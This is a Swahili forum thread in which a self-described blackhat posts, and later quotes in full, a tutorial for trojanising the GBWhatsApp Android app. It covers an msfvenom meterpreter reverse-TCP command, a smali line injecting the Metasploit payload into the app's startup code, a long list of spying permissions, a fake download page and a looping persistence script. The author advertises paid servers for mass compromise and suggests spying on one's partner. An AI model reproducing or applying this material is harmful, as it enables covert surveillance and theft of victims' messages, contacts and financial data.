{blackhat hackers} Jinsi unavyowezwa kuibiwa stuffs zako (bank accounts,credit cards,personal info,social networks a/c n.k)

Thefreedom

JF-Expert Member
Jan 27, 2019
319
313
hey guys ......
Thefreedom is here ........

leo nipo hapa kuwaonesha na kuwafunza hasa kwa wale watanzania wezangu ambao hawana kabisa knowledge na hacking. Sasa leo nimekuja kuwafunza kitu kidogo sana ambacho wewe white hacker,script_hackers unaweza jifunza kitu .

LENGO LA MASOMO YANGU NI KAMA IFUATAVYO

1. kujikinga na kuchukua tahadhari
2. unaweza improve ur hacking skills
3. Kufahamu na kuchukua hatua
4. mengineyo........


na leo nitatumia lugha nyepesi ili twende saawa ..kwa wale walioniinbox kwamba my stuffs ni ngumu kumeza leo nimefanya simple.......kutokana na level za watu ambao hawana knowledge na lugha ya kompyuta(codes).......LETS START

Kama kichwa cha habari kinavyosema leo nitawaonesha ni jinsi GANI blackhats wanavyoweza comprimize ur dataS kwa kupitia vurnerability iliyo kwenye androids applications....(IN ADVANCE)

Kila mtu ni mpenzi wa kutumia simu yani smartphones, na ni kweli simu zetu zimekuwa zikifanya kazi kubwa ya kuturahisishia task nyingi sana....Wengine tunatumia hata kutransfer pesa/kustore/kufanya mihamala online KWA kutumia andoird apps n.k

androids apps(APK) ni nn?
hili swali kila mtanzania anaweza jibu ila kwa lugha ya kitoto na kueleweka wengine wanasema hizi ni applications za simu zinazofanyakaz kwenye simu .......>>>SIMPLE


kwa kuongezea hizi applications zilizotengenezwa kwa muunganiko wa files zilizoandikwa kwa lugha ya computer na kufanya kazi kwenye mfumo androids (android operating system).>>>>SIMPLE

HIVYO basi makampuni makubwa mfano whtsap,instagram,banks, n.k wamewaweka wateja wao karibu kwa kuwarahisishia kufanya kila kitu kwenye simu zao kupitia android applications

sasa leo tutaona how blackhats wanavyoweza iba hizo details kupitia hizo androids apps.........

REQUIREMENTS
1. Web server hosting (use 6net) PREMIUM
2. kali linux OS
3. APKTOOLS windows or kali version >>>download Dropbox - APK Easy Tool - Simplify your life


STEPS

1. hatua ya kwanza KUTENENGEZA HOSTED PAGE , register na premium host na tengeneza index.html au kama wewe ni script kiddie, easy nenda kwenye official web ya kampuni husika ambayo wamelaunch page ya kudownload android app yao mfano me nitatumia GBWhAtsap page . ukifka kwenye page husika kama unatumia firefox au browser yyte right click na press VIEW PAGE SOURCE
1.png


ukiview page source zitakuja kama hivi hapa chini

2.png


hizi ndizo page source of code utapress CONTRL + S >>>> save as downloadGBWhatsap.html
kwann waaandika downloadGBWhatsap.html hii ni kwasabb wakihost link zitakuwa linked na mwisho utaona jina la hio html ....victim wa kawaida atajua this is serious....

baada ya hapo lipia host premium yenye C-panel + SSL certificate na kahost hio page jina la website unaweza ukaweka mfano https://latestGBmodapks,com

NOTE. KWA blackhats wengi tunakuwa tuna uplaod final app GOOGLE PLAY STORE ambayo itakuwa tayr kwa kutarget victim na we dont care about google protect security scan bcz we can bypass it na encrypted malicious codes .
ila kama hutaki mzunguko tumia njia ya juu hapo.......


2. Download official GBwhatsap application na Generate metasploit backdoor using kali linux
hatua hii ni kuinject malicious codes kwenye targeted app ambayo ni GBWhatsap...sasa hapa kama unataka kucomprimise datas za more tha 1000 people i have server na configs waweza nichek kwa bei poa...kila victim atakuwa na chumba chake kwenye sever na utapata all stuffs after this.

ila kama unataka kumtarget a specific person utafanya hiivi..........

open kali linux terminal kisha typ

msfvenom -p android/meterpreter/reverse_tcp LHOST="weka ip ya server(make sure iko na forwaded port" LPORT="weka port ya server" > /root/Desktop/backdoor.apk kisha press enter

4.png



note . kwenye server ip na port nashauri use portmap.io iko stable na haiitaji server na utaweza forwad port >>>>>>>just search google how to set portmap.io for reverse connection

kwann reverse CONNECTION?
kikubwa hapo tunataka target aki run whatsap au target application tunataka connection irud in our attacking server au machine .

INAENDELEAAAA.......( baada ya dakika kadhaaaa)

>>>>lets proceed

baada ya kutengeneza backdoor na kudownload GBwHatsap .....kinachofuata ni ku inject malicious codes kwenye GBWhatsap

sasa hapa kama umenunua my package unaweza inject advance codes ila kwa ndugu wasomaji wa kawaida am going to show a basic code

3. fungua easy apk tool kisha unachotakiwa kufanya ni ku sehemu imeeandikwa DECOMPILE lakn kabla ya hapo hakikisha umeset output na input kwenye option

bati.png


nadhan utaona hapo chini decompile nimesave in input kwenye desktop pamoja na location ya output basi vingine acha kama vilivyo

nn.png


sasa utarepeate ku de-compile pia kwenye app ya GBWHATSAP

kwann tuna decomple ??? hii ni kwasabubu tuone source of codes zilizounda hio application .

sasa ukidecomplie hizo app ukienda kwenye input folder lako la desktop utakuta file za apps zote mbili

vvv.png


sasa kwa kila fiolder hapo juu ukifungua ndani utakuta files ambazo zimeandikwa kwa lughya ya kompyuter ambazo zinafanyakazi kurun hizi apps

SASA KUNA KI CONCEPT UELEWE.......

ni kwamba hizi apps kila mara user aki open in maana kwamba its main activity nayo inaanza kurun na kuwezesha user kufurahia huduma ya hio application ...sasa basi kwa kutumia akili za kibadamu unaweza jiuliza ..
kama mtu aki open app husika main activity nayo inarun ...what if nikiweka malicious codes kwenye hiko ki main activity itakuaje?

jibu ni kwamba ukiweka malicious codes kwenye hiko kimain activity kitakachotokea ni kwamba yule user akirun app husika main activity ita start run pamoja na our malicious codes na moja kwa moja tutapata session kwenye server au attacking machine machine .

sasa embu tutafute hio main activity kwenye hio GBwhatsap application

nenda kwenye output folder ya gb whatsap fungua .....ukifungua utaona file limeandikwa androidmanifest open na notepad nashauri tumia notepad++
android.png


edit na notepad++ .....sasa select sehemu yoyote alafu press CONTRL + F yani find ...kwenye dialog ya kufind andika "main"
ukisearch utapata kama inavyoneekan hapo chiniii
main.png


sasa utaona sehemu imeandikwa kama hivi android:name="com.gbwhatsapp.Main

hii ina maana kwamba main activity ya app ipo kwenye location SMALI>>COM FOLDER KISHA >>GBWHATSAPP >>ndipo tunakipata iko ki part kinaitwa main.activity

TWENDE TUKAKICHEK .............................

Shot 0010.png


NADHANI mmekiona sasa kinachofanyika ni kuki edit na notepad++
na ukiedit hiko ki main part press CONTRL + F kisha andika search for "OnCreat"

Shot 0011.png


ukisearch utaona kama hiviiiiiiii

Shot 0012.png


utaaaona hio sehemu hapo sasa hio ndio main part ambayo user akirun yani akifungua app nayooo inaanza run sasa lets add something there kwaamba akirun iamshe na server au malicious codes zetu utaa add hii code
chini code nilizozionesha kwenye picha hapo juu chini yake weka codes hizi hapa chini

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start (Landroid/content/Content; )V

itaonekana kama hiviiiiii

Shot 0013.png


baada ya kufanya hivooo nenda kwenye INPUT FOLDERS zako ka fungua file la backdoor kisha nenda
Shot 0014.png
file la smali>>>com>>>utakuta file limeandikwa METASPLOIT li copy

nenda kali paste kwenye file la gbwhatsap>>>smali>>com>> paste hapa

angalia picha ya juuu hapo

baada ya hapo hatua inayofuata ni ku add permisions hapa ndo patamu ukitaka upate sms,uifanye iupload stuffs sehemu ni wewe tu ila kwa wale walionunua my package nimewaonesha how to configure ili isend all statements za pesa nk

ila kwa majaribio just nenda kwenye file la backdoor edit android manifest utaona permisions za kutosha chukua copy kisha njooo ongezea kwenye gbwahtsap android manifest file utakuta permisions pia so utaongezea unazotaaka mfano me nitaweka permisons hizi hapa chini

<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_CONTACTS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>


baada ya hapo nitasave hilo files zote hadi za uko juuuu zote nilizoweka codes zangu mwishooo fungua apk easy tool sasa now instead ya decomple press COMPILE ili itenegeze new GBwhatsap ambayo iko injected na malicious codes

Shot 0015.png


baada ya hapo ndipo wanaweka labda kwenye PLAYSTORE n.k

ila kama wataka test wewe kama wewe , kwenye step one tulitengeneza page edit ile page kisha kwenye codes zake search sehemu yenye kudownload alafu upload hio gbwhatsap hata mediafires alafu weka link yake then host na mtumie victim wako

wakati huo umewasha server listiner kwa kutumia msfconsole kwenye linux

akiiinstall tu huyo victim kwako utapata session na unaweza pata vitu vyote ulivyoviweka kwenye permissions juu .

sasa kwa wale WAPENZ ukitaka mfanyia baby wako hiii unamwambia tu BBY INGIA WHATSAP ......akingia na ile app atakuwa hacked


HOW TO CREATE PERSISTENCE ON THIS??????

persistence means kumaintain access atakama target akiwa amegoma kurun malicious app yetu

reference


Definition - What does Persistence mean?

Persistence refers to object and process characteristics that continue to exist even after the process that created it ceases or the machine it is running on is powered off. When an object or state is created and needs to be persistent, it is saved in a non-volatile storage location, like a hard drive, versus a temporary file or volatile random access memory (RAM

sasa hiii tunaweza fanya hata kwenye android pia hata pc

kwenye android save hizi code as shell.sh

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done


baada ya hapo upload kwenye target kupitia remote connection via metasploit

baada ya hapo ukiwa na metasploit session

use upload /root/Desktop/shell.sh /storage/emulated/0/Download

hiii /storage/emulated/0/Download ni tArgeted file location

baada ya ku upload run hiii command easy type "shell"

baada ya hapo nenda location ulio upload shell kwenye victim phone remotely

ukifika run bash shell.sh kisha subiri dakk tano

itaaattack start up na kila huyu victim akiwasha simu au kila baada ya dkk 20 kama ilivyo kwenye shell yetu utapata session.

THANKS MUCH....

Thefreedom

kwa ambao watashindwa download my video hapa thefreedomBlackhat.mp4

PEACE










I
 
Ni kazi ngumu kwa kweli!! But it's worth!! Kumbe kuna watu wanafikiri to infinity and beyond ili ku make life wakati sisi tunawaza tu kupiga mlami sound akielewa unalamba $1000 na kutulia ukijipongeza!! Big up mkuu.
 
Shukrani kwa mapindi yako.

Nawezaje, ku decompile app, ni edit vile nataka kwa matumizi yangu?? Mfano zile interface zake, icon n. K??

Sent using Jamii Forums mobile app
Unaweza tumia android studio, apk editor pc, au hio hio apk easy tool kuna options ya decompile na compile sasa ukidecompile unaenda kwenye android manifest unatafuta APPLICATION TAG kwenye search box na utaona kitu kama hiki

< application >


Kama hakuna string hio basi unaweza add manual

Use

Kwenye application tag

Mbele ya hii tag < application >

Weka android :icon="@mipmap/your photo name" kisha SAVE

KISHA nenda kwenye files zako ulizodecompile fumgua file limeandikwa res ndani ya hilo file add new file na ulirename as mipmap-hdpi-v4

Kisha ndani hio mipmap-hdpi-v4 weka image.png na hakikisha jina la image lifanane na ile ulioweka kule kwenye androidmanifest juu hapo.... Pia pixel weka 48x48

Kisha nenda kwenye apk easy tool press compile

App itakuwa na icon unayotaka wewe
 
Ni kazi ngumu kwa kweli!! But it's worth!! Kumbe kuna watu wanafikiri to infinity and beyond ili ku make life wakati sisi tunawaza tu kupiga mlami sound akielewa unalamba $1000 na kutulia ukijipongeza!! Big up mkuu.
Thanks
 
hey guys ......
Thefreedom is here ........

leo nipo hapa kuwaonesha na kuwafunza hasa kwa wale watanzania wezangu ambao hawana kabisa knowledge na hacking. Sasa leo nimekuja kuwafunza kitu kidogo sana ambacho wewe white hacker,script_hackers unaweza jifunza kitu .

LENGO LA MASOMO YANGU NI KAMA IFUATAVYO

1. kujikinga na kuchukua tahadhari
2. unaweza improve ur hacking skills
3. Kufahamu na kuchukua hatua
4. mengineyo........


na leo nitatumia lugha nyepesi ili twende saawa ..kwa wale walioniinbox kwamba my stuffs ni ngumu kumeza leo nimefanya simple.......kutokana na level za watu ambao hawana knowledge na lugha ya kompyuta(codes).......LETS START

Kama kichwa cha habari kinavyosema leo nitawaonesha ni jinsi GANI blackhats wanavyoweza comprimize ur dataS kwa kupitia vurnerability iliyo kwenye androids applications....(IN ADVANCE)

Kila mtu ni mpenzi wa kutumia simu yani smartphones, na ni kweli simu zetu zimekuwa zikifanya kazi kubwa ya kuturahisishia task nyingi sana....Wengine tunatumia hata kutransfer pesa/kustore/kufanya mihamala online KWA kutumia andoird apps n.k

androids apps(APK) ni nn?
hili swali kila mtanzania anaweza jibu ila kwa lugha ya kitoto na kueleweka wengine wanasema hizi ni applications za simu zinazofanyakaz kwenye simu .......>>>SIMPLE


kwa kuongezea hizi applications zilizotengenezwa kwa muunganiko wa files zilizoandikwa kwa lugha ya computer na kufanya kazi kwenye mfumo androids (android operating system).>>>>SIMPLE

HIVYO basi makampuni makubwa mfano whtsap,instagram,banks, n.k wamewaweka wateja wao karibu kwa kuwarahisishia kufanya kila kitu kwenye simu zao kupitia android applications

sasa leo tutaona how blackhats wanavyoweza iba hizo details kupitia hizo androids apps.........

REQUIREMENTS
1. Web server hosting (use 6net) PREMIUM
2. kali linux OS
3. APKTOOLS windows or kali version >>>download Dropbox - APK Easy Tool - Simplify your life


STEPS

1. hatua ya kwanza KUTENENGEZA HOSTED PAGE , register na premium host na tengeneza index.html au kama wewe ni script kiddie, easy nenda kwenye official web ya kampuni husika ambayo wamelaunch page ya kudownload android app yao mfano me nitatumia GBWhAtsap page . ukifka kwenye page husika kama unatumia firefox au browser yyte right click na press VIEW PAGE SOURCE
View attachment 1037426

ukiview page source zitakuja kama hivi hapa chini

View attachment 1037428

hizi ndizo page source of code utapress CONTRL + S >>>> save as downloadGBWhatsap.html
kwann waaandika downloadGBWhatsap.html hii ni kwasabb wakihost link zitakuwa linked na mwisho utaona jina la hio html ....victim wa kawaida atajua this is serious....

baada ya hapo lipia host premium yenye C-panel + SSL certificate na kahost hio page jina la website unaweza ukaweka mfano https://latestGBmodapks,com

NOTE. KWA blackhats wengi tunakuwa tuna uplaod final app GOOGLE PLAY STORE ambayo itakuwa tayr kwa kutarget victim na we dont care about google protect security scan bcz we can bypass it na encrypted malicious codes .
ila kama hutaki mzunguko tumia njia ya juu hapo.......


2. Download official GBwhatsap application na Generate metasploit backdoor using kali linux
hatua hii ni kuinject malicious codes kwenye targeted app ambayo ni GBWhatsap...sasa hapa kama unataka kucomprimise datas za more tha 1000 people i have server na configs waweza nichek kwa bei poa...kila victim atakuwa na chumba chake kwenye sever na utapata all stuffs after this.

ila kama unataka kumtarget a specific person utafanya hiivi..........

open kali linux terminal kisha typ

msfvenom -p android/meterpreter/reverse_tcp LHOST="weka ip ya server(make sure iko na forwaded port" LPORT="weka port ya server" > /root/Desktop/backdoor.apk kisha press enter

View attachment 1037464


note . kwenye server ip na port nashauri use portmap.io iko stable na haiitaji server na utaweza forwad port >>>>>>>just search google how to set portmap.io for reverse connection

kwann reverse CONNECTION?
kikubwa hapo tunataka target aki run whatsap au target application tunataka connection irud in our attacking server au machine .

INAENDELEAAAA.......( baada ya dakika kadhaaaa)

>>>>lets proceed

baada ya kutengeneza backdoor na kudownload GBwHatsap .....kinachofuata ni ku inject malicious codes kwenye GBWhatsap

sasa hapa kama umenunua my package unaweza inject advance codes ila kwa ndugu wasomaji wa kawaida am going to show a basic code

3. fungua easy apk tool kisha unachotakiwa kufanya ni ku sehemu imeeandikwa DECOMPILE lakn kabla ya hapo hakikisha umeset output na input kwenye option

View attachment 1037486

nadhan utaona hapo chini decompile nimesave in input kwenye desktop pamoja na location ya output basi vingine acha kama vilivyo

View attachment 1037490

sasa utarepeate ku de-compile pia kwenye app ya GBWHATSAP

kwann tuna decomple ??? hii ni kwasabubu tuone source of codes zilizounda hio application .

sasa ukidecomplie hizo app ukienda kwenye input folder lako la desktop utakuta file za apps zote mbili

View attachment 1037499

sasa kwa kila fiolder hapo juu ukifungua ndani utakuta files ambazo zimeandikwa kwa lughya ya kompyuter ambazo zinafanyakazi kurun hizi apps

SASA KUNA KI CONCEPT UELEWE.......

ni kwamba hizi apps kila mara user aki open in maana kwamba its main activity nayo inaanza kurun na kuwezesha user kufurahia huduma ya hio application ...sasa basi kwa kutumia akili za kibadamu unaweza jiuliza ..
kama mtu aki open app husika main activity nayo inarun ...what if nikiweka malicious codes kwenye hiko ki main activity itakuaje?

jibu ni kwamba ukiweka malicious codes kwenye hiko kimain activity kitakachotokea ni kwamba yule user akirun app husika main activity ita start run pamoja na our malicious codes na moja kwa moja tutapata session kwenye server au attacking machine machine .

sasa embu tutafute hio main activity kwenye hio GBwhatsap application

nenda kwenye output folder ya gb whatsap fungua .....ukifungua utaona file limeandikwa androidmanifest open na notepad nashauri tumia notepad++
View attachment 1037502

edit na notepad++ .....sasa select sehemu yoyote alafu press CONTRL + F yani find ...kwenye dialog ya kufind andika "main"
ukisearch utapata kama inavyoneekan hapo chiniii
View attachment 1037509

sasa utaona sehemu imeandikwa kama hivi android:name="com.gbwhatsapp.Main

hii ina maana kwamba main activity ya app ipo kwenye location SMALI>>COM FOLDER KISHA >>GBWHATSAPP >>ndipo tunakipata iko ki part kinaitwa main.activity

TWENDE TUKAKICHEK .............................

View attachment 1037512

NADHANI mmekiona sasa kinachofanyika ni kuki edit na notepad++
na ukiedit hiko ki main part press CONTRL + F kisha andika search for "OnCreat"

View attachment 1037515

ukisearch utaona kama hiviiiiiiii

View attachment 1037516

utaaaona hio sehemu hapo sasa hio ndio main part ambayo user akirun yani akifungua app nayooo inaanza run sasa lets add something there kwaamba akirun iamshe na server au malicious codes zetu utaa add hii code
chini code nilizozionesha kwenye picha hapo juu chini yake weka codes hizi hapa chini

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start (Landroid/content/Content; )V

itaonekana kama hiviiiiii

View attachment 1037523

baada ya kufanya hivooo nenda kwenye INPUT FOLDERS zako ka fungua file la backdoor kisha nenda
View attachment 1037527file la smali>>>com>>>utakuta file limeandikwa METASPLOIT li copy

nenda kali paste kwenye file la gbwhatsap>>>smali>>com>> paste hapa

angalia picha ya juuu hapo

baada ya hapo hatua inayofuata ni ku add permisions hapa ndo patamu ukitaka upate sms,uifanye iupload stuffs sehemu ni wewe tu ila kwa wale walionunua my package nimewaonesha how to configure ili isend all statements za pesa nk

ila kwa majaribio just nenda kwenye file la backdoor edit android manifest utaona permisions za kutosha chukua copy kisha njooo ongezea kwenye gbwahtsap android manifest file utakuta permisions pia so utaongezea unazotaaka mfano me nitaweka permisons hizi hapa chini

<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_CONTACTS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>


baada ya hapo nitasave hilo files zote hadi za uko juuuu zote nilizoweka codes zangu mwishooo fungua apk easy tool sasa now instead ya decomple press COMPILE ili itenegeze new GBwhatsap ambayo iko injected na malicious codes

View attachment 1037530

baada ya hapo ndipo wanaweka labda kwenye PLAYSTORE n.k

ila kama wataka test wewe kama wewe , kwenye step one tulitengeneza page edit ile page kisha kwenye codes zake search sehemu yenye kudownload alafu upload hio gbwhatsap hata mediafires alafu weka link yake then host na mtumie victim wako

wakati huo umewasha server listiner kwa kutumia msfconsole kwenye linux

akiiinstall tu huyo victim kwako utapata session na unaweza pata vitu vyote ulivyoviweka kwenye permissions juu .

sasa kwa wale WAPENZ ukitaka mfanyia baby wako hiii unamwambia tu BBY INGIA WHATSAP ......akingia na ile app atakuwa hacked


HOW TO CREATE PERSISTENCE ON THIS??????

persistence means kumaintain access atakama target akiwa amegoma kurun malicious app yetu

reference


Definition - What does Persistence mean?

Persistence refers to object and process characteristics that continue to exist even after the process that created it ceases or the machine it is running on is powered off. When an object or state is created and needs to be persistent, it is saved in a non-volatile storage location, like a hard drive, versus a temporary file or volatile random access memory (RAM

sasa hiii tunaweza fanya hata kwenye android pia hata pc

kwenye android save hizi code as shell.sh

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done


baada ya hapo upload kwenye target kupitia remote connection via metasploit

baada ya hapo ukiwa na metasploit session

use upload /root/Desktop/shell.sh /storage/emulated/0/Download

hiii /storage/emulated/0/Download ni tArgeted file location

baada ya ku upload run hiii command easy type "shell"

baada ya hapo nenda location ulio upload shell kwenye victim phone remotely

ukifika run bash shell.sh kisha subiri dakk tano

itaaattack start up na kila huyu victim akiwasha simu au kila baada ya dkk 20 kama ilivyo kwenye shell yetu utapata session.

THANKS MUCH....

Thefreedom

kwa ambao watashindwa download my video hapa thefreedomBlackhat.mp4

PEACE










I
Wewe ndie ume hack Simu yangu Jana?
 
Back
Top Bottom